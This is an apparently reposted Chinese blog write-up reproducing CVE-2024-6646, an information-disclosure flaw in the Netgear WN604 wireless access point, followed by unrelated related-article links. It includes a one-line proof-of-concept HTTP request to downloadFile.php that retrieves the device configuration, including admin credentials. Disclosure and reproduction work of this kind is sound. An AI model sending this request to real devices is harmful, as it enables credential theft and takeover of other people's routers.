博客
关于我
Netgear WN604 downloadFile.php 信息泄露漏洞复现(CVE-2024-6646)
阅读量:794 次
发布时间:2023-02-14

本文共 492 字,大约阅读时间需要 1 分钟。

0x01 NETGEAR WN604 产品简介

NETGEAR WN604由NETGEAR公司生产,是一款支持Wi-Fi保护协议(WPA2-PSK, WPA-PSK)和有线等效加密(WEP)64位、128位和152位的无线接入器。此外,该设备还支持MAC地址认证、802.1x RADIUS以及EAP TLS、TTLS、PEAP等安全机制,为用户提供了全面的网络安全保障。

0x02 漏洞概述

在Netgear WN604的downloadFile.php接口中发现了一个信息泄露漏洞。攻击者可通过远程方式获取无线路由器的管理员账号密码,进而控制路由器后台,可能对无线网络造成破坏或发起进一步的威胁。

0x03 影响范围

该漏洞影响Netgear WN604版本号小于等于20240710的设备。

0x04 复现环境

设备运行环境包括:主机名为"Netgear",并支持相关的网络配置。

0x05 漏洞复现

PoC(Proof of Concept)代码如下:

GET /downloadFile.php?file=config HTTP/1.1  Host: User-Agent:

转载地址:http://rbcfk.baihongyu.com/

你可能感兴趣的文章
Neo4j图数据库_web页面关闭登录实现免登陆访问_常用的cypher语句_删除_查询_创建关系图谱---Neo4j图数据库工作笔记0013
查看>>
Neo4j图数据库的介绍_图数据库结构_节点_关系_属性_数据---Neo4j图数据库工作笔记0001
查看>>
Neo4j图数据库的数据模型_包括节点_属性_数据_关系---Neo4j图数据库工作笔记0002
查看>>
Neo4j安装部署及使用
查看>>
Neo4j电影关系图Cypher
查看>>
Neo4j的安装与使用
查看>>
Neo4j(1):图数据库Neo4j介绍
查看>>
Neo4j(2):环境搭建
查看>>
Neo4j(3):Neo4j Desktop安装
查看>>
Neo4j(4):Neo4j - CQL使用
查看>>
Neo图数据库与python交互
查看>>
NEO改进协议提案1(NEP-1)
查看>>
Neo私链
查看>>
NervanaGPU 项目使用教程
查看>>
Nerves 项目教程
查看>>
nessus快速安装使用指南(非常详细)零基础入门到精通,收藏这一篇就够了
查看>>
Nessus漏洞扫描教程之配置Nessus
查看>>
Nest.js 6.0.0 正式版发布,基于 TypeScript 的 Node.js 框架
查看>>
nested exception is org.apache.ibatis.builder.BuilderException: Error parsing Mapper XML.
查看>>
nestesd exception is java .lang.NoSuchMethodError:com.goolge.common.collect
查看>>